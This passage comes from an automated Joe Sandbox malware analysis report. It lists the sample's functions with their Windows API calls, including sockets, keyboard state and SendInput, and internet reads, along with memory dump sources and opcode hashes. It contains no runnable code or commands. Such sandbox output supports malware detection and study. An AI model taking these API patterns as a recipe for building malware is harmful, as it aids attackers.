                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove
                                                                                                                        • String ID: hN$tM
                                                                                                                        • API String ID: 4104443479-658128583
                                                                                                                        • Opcode ID: 0549ff62d35156970d9a99d0ea361f06b36e551688fef306dd8afb99fb8bdc91
                                                                                                                        • Instruction ID: 8532846addcd6d9b1a5f78613e090b8b8915918032bc76f05c1d513d5f97ce78
                                                                                                                        • Opcode Fuzzy Hash: 0549ff62d35156970d9a99d0ea361f06b36e551688fef306dd8afb99fb8bdc91
                                                                                                                        • Instruction Fuzzy Hash: 7AA22875E01219DFCF28CF58C8806ADBBB1BF48314F2581AAD959AB390D774DE81DB60
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DB010A: std::exception::exception.LIBCMT ref: 00DB013E
                                                                                                                          • Part of subcall function 00DB010A: __CxxThrowException@8.LIBCMT ref: 00DB0153
                                                                                                                        • _memmove.LIBCMT ref: 00E03020
                                                                                                                        • _memmove.LIBCMT ref: 00E03135
                                                                                                                        • _memmove.LIBCMT ref: 00E031DC
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1300846289-0
                                                                                                                        • Opcode ID: 749f1bc462302cd70cede2c407a5976317ab11efce403136fbfc9846ce7ce7c1
                                                                                                                        • Instruction ID: 1afd30ad913e7e9d7c8ab5089614ae081226c6896466a3d88065e7e61c8334f2
                                                                                                                        • Opcode Fuzzy Hash: 749f1bc462302cd70cede2c407a5976317ab11efce403136fbfc9846ce7ce7c1
                                                                                                                        • Instruction Fuzzy Hash: EA02B271A00205DFCF04DF68C981AAEBBF5EF49340F148469E806EB295EB31DA55CBB5
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DEACD3: inet_addr.WS2_32(00000000), ref: 00DEACF5
                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00DE973D
                                                                                                                        • WSAGetLastError.WS2_32(00000000,00000000), ref: 00DE9760
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastinet_addrsocket
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4170576061-0
                                                                                                                        • Opcode ID: 7646f4fe137f763ac0f6fca9d20f6a1e9578bbfd5f8ddd5f9c51745ef65ade4a
                                                                                                                        • Instruction ID: f21955adb5549d18ef504a33381a4aa5c78de1b6e290e5c595fa531086579fe3
                                                                                                                        • Opcode Fuzzy Hash: 7646f4fe137f763ac0f6fca9d20f6a1e9578bbfd5f8ddd5f9c51745ef65ade4a
                                                                                                                        • Instruction Fuzzy Hash: 8641C374A00200AFDB10AF69CC82E7EB7EDEF45724F148459F956AB392DB749D018BB1
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00DDF37A
                                                                                                                        • _wcscmp.LIBCMT ref: 00DDF3AA
                                                                                                                        • _wcscmp.LIBCMT ref: 00DDF3BF
                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00DDF3D0
                                                                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00DDF3FE
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2387731787-0
                                                                                                                        • Opcode ID: cae384f0ffc658614bd9e004fdd388b888ae108d34d5b33f07017f348ff437c1
                                                                                                                        • Instruction ID: 733e437f4ebcb994d4959c7da38d57e4398004619a5d52cc965f7d6713ce856c
                                                                                                                        • Opcode Fuzzy Hash: cae384f0ffc658614bd9e004fdd388b888ae108d34d5b33f07017f348ff437c1
                                                                                                                        • Instruction Fuzzy Hash: D3419E356047029FCB08DF28C890E9AB7E4FF49324F14456EE95ACB3A1DB31E945CBA1
                                                                                                                        APIs
                                                                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00DD439C
                                                                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00DD43B8
                                                                                                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00DD4425
                                                                                                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00DD4483
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: KeyboardState$InputMessagePostSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 432972143-0
                                                                                                                        • Opcode ID: 53ce3d793a08e1b58f911d7d6011389b28f11308215cb93775b10b3cbeb20a73
                                                                                                                        • Instruction ID: 9777da327a223d0d5d84d33553d92763bd38c908bf4054860eab55c5812a4e5f
                                                                                                                        • Opcode Fuzzy Hash: 53ce3d793a08e1b58f911d7d6011389b28f11308215cb93775b10b3cbeb20a73
                                                                                                                        • Instruction Fuzzy Hash: 5741F5B0A44248AFEF208BA5D844BFD7BB9AB55311F08415BF4C5A23C1C7B489C59772
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E
                                                                                                                        • GetCursorPos.USER32(?), ref: 00DFEFE2
                                                                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00E0F3C3,?,?,?,?,?), ref: 00DFEFF7
                                                                                                                        • GetCursorPos.USER32(?), ref: 00DFF041
                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,00E0F3C3,?,?,?), ref: 00DFF077
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1423138444-0
                                                                                                                        • Opcode ID: da35e1a5c5dc07c8687546a2b5a1b48313bc2fdfa5947bcc7e6aaf2d10ecbe8c
                                                                                                                        • Instruction ID: 48d2b4f675feb3c40812f4ea366d71de8fd5b4ac3d01292a2dc80d74da35a24a
                                                                                                                        • Opcode Fuzzy Hash: da35e1a5c5dc07c8687546a2b5a1b48313bc2fdfa5947bcc7e6aaf2d10ecbe8c
                                                                                                                        • Instruction Fuzzy Hash: 3C21E135500128EFCB298F55CC99FFA7BB5EF49750F088069FA05672A2C7319D51DBA0
                                                                                                                        APIs
                                                                                                                        • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00DD221E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: lstrlen
                                                                                                                        • String ID: ($|
                                                                                                                        • API String ID: 1659193697-1631851259
                                                                                                                        • Opcode ID: 06bb5f2b783710ff3321b35e5cae0c1151f0990b40b4860c30e7f78bb33eead3
                                                                                                                        • Instruction ID: 34e24d8e06e8fd05716ebe10cf31a3fdb890fa537cda71ab85796ff039273fdc
                                                                                                                        • Opcode Fuzzy Hash: 06bb5f2b783710ff3321b35e5cae0c1151f0990b40b4860c30e7f78bb33eead3
                                                                                                                        • Instruction Fuzzy Hash: 0F321475A007059FC728CF69C481AAAB7F0FF58320B15C46EE49ADB7A1E770E941CB64
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E
                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,?,?,?,?), ref: 00DAAE5E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DialogLongNtdllProc_Window
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2065330234-0
                                                                                                                        • Opcode ID: 9729e483f1e012f7b8aae9ec0f7c8f29cfa6fb176dc3e1419b9a682f45fc3dd0
                                                                                                                        • Instruction ID: dd19fd0f7ecbfd11bb1282dd35451545f9dc411914cbab8ad5cdc3666a7fc80e
                                                                                                                        • Opcode Fuzzy Hash: 9729e483f1e012f7b8aae9ec0f7c8f29cfa6fb176dc3e1419b9a682f45fc3dd0
                                                                                                                        • Instruction Fuzzy Hash: A3A11860204205BEDB38AB2D8C88EBF3A5CEF43755B144729F582E65E1EB29CD51D273
                                                                                                                        APIs
                                                                                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00DE4A1E,00000000), ref: 00DE55FD
                                                                                                                        • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00DE5629
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Internet$AvailableDataFileQueryRead
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 599397726-0
                                                                                                                        • Opcode ID: 36b4ac67c2f7c5cfe618039de569400ab7c8cb0e8768f2b0ba7b4d7ae2e3ca66
                                                                                                                        • Instruction ID: 42c760c85eac9fc7c6d64f55295d5031ecc13d0f3295f3358e9312162e1724bd
                                                                                                                        • Opcode Fuzzy Hash: 36b4ac67c2f7c5cfe618039de569400ab7c8cb0e8768f2b0ba7b4d7ae2e3ca66
                                                                                                                        • Instruction Fuzzy Hash: D1411471500A48FFEB10AE96EC81EBFB7BDEB4039CF14401EF206A6185DA709E409B70
                                                                                                                        APIs
                                                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00DDEA95
                                                                                                                        • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00DDEAEF
                                                                                                                        • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00DDEB3C
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorMode$DiskFreeSpace
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1682464887-0
                                                                                                                        • Opcode ID: 36e11d36bbf212ab80396f6bcc9cb7691dfa7f957a2ff81507208f24d45ee549
                                                                                                                        • Instruction ID: b3b9b8ce8e34de83aa087213ef2c0f5b3ffcb9a392c1ca394310b32afc4be3ba
                                                                                                                        • Opcode Fuzzy Hash: 36e11d36bbf212ab80396f6bcc9cb7691dfa7f957a2ff81507208f24d45ee549
                                                                                                                        • Instruction Fuzzy Hash: C7213135A00218EFCB00DFA5D895AEDBBB4FF49310F15849AE945AB351DB31D915CB60
                                                                                                                        APIs
                                                                                                                        • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00DD70D8
                                                                                                                        • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00DD7115
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00DD711E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 33631002-0
                                                                                                                        • Opcode ID: b079a015286b81bb7c83bfeb190538a9e5f65ddfc2c124a2a2715fd79f2b598d
                                                                                                                        • Instruction ID: 09570125fe546172568d939ebe159d8259530524902e3d3b4c357e9f3c85b749
                                                                                                                        • Opcode Fuzzy Hash: b079a015286b81bb7c83bfeb190538a9e5f65ddfc2c124a2a2715fd79f2b598d
                                                                                                                        • Instruction Fuzzy Hash: D011A5B1A04229BEE7108BA8DC45FEF77BCEB08714F004656B901F7290D2B49E0487E1
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E
                                                                                                                          • Part of subcall function 00DAB155: GetWindowLongW.USER32(?,000000EB), ref: 00DAB166
                                                                                                                        • GetParent.USER32(?), ref: 00E0F4B5
                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?,?,?,?,?,00DAADDD,?,?,?,00000006,?), ref: 00E0F52F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongWindow$DialogNtdllParentProc_
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 314495775-0
                                                                                                                        • Opcode ID: 06cfedad472128cbcb072a6d12f279f835ebb63d22a721fec2e6f940d974c37b
                                                                                                                        • Instruction ID: 792795dfb9f348e92e3a0388bebbd4db47552c86ed642d92d356989977784249
                                                                                                                        • Opcode Fuzzy Hash: 06cfedad472128cbcb072a6d12f279f835ebb63d22a721fec2e6f940d974c37b
                                                                                                                        • Instruction Fuzzy Hash: 94216F31200104AFCB388F28DC49AAA3BA2EB47374F185665F5396B2E3C7319D56D765
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00DAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00DAAF8E
                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,00E0F352,?,?,?), ref: 00DFF115
                                                                                                                          • Part of subcall function 00DAB155: GetWindowLongW.USER32(?,000000EB), ref: 00DAB166
                                                                                                                        • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 00DFF0FB
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: LongWindow$DialogMessageNtdllProc_Send
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1273190321-0
                                                                                                                        • Opcode ID: 5216034329fa268ab573e87293a377a19822ce7a9f0f0ddc1d22d0ae63b9a378
                                                                                                                        • Instruction ID: a953019d4c0a2898216de2900e42930ce93c7ac79aae4d9032bd1130fa71f27e
                                                                                                                        • Opcode Fuzzy Hash: 5216034329fa268ab573e87293a377a19822ce7a9f0f0ddc1d22d0ae63b9a378
                                                                                                                        • Instruction Fuzzy Hash: 4001B131200308EFCB259F15DC45FBA3BA6FF86364F198564FA555B2A1C7329806DB71
                                                                                                                        APIs
                                                                                                                        • ClientToScreen.USER32(?,?), ref: 00DFF47D
                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,00E0F42E,?,?,?,?,?), ref: 00DFF4A6
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
                                                                                                                        • Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        • Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ClientDialogNtdllProc_Screen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3420055661-0
                                                                                                                        • Opcode ID: f096f593e307cbe07fa08e337e99ca886d878b75d56b823a09ca6ec8f707fe9d
                                                                                                                        • Instruction ID: 62725100484f6d1d2e0a601add76214a91dd47045223e9b5af8401c35d884670
                                                                                                                        • Opcode Fuzzy Hash: f096f593e307cbe07fa08e337e99ca886d878b75d56b823a09ca6ec8f707fe9d
                                                                                                                        • Instruction Fuzzy Hash: 51F01772400118FFEB049F96DC09AEE7BB9FF48351F14805AFA02A2160D3B5AA55EB60
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00DEC2E2,?,?,00000000,?), ref: 00DDD73F
                                                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00DEC2E2,?,?,00000000,?), ref: 00DDD751
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true
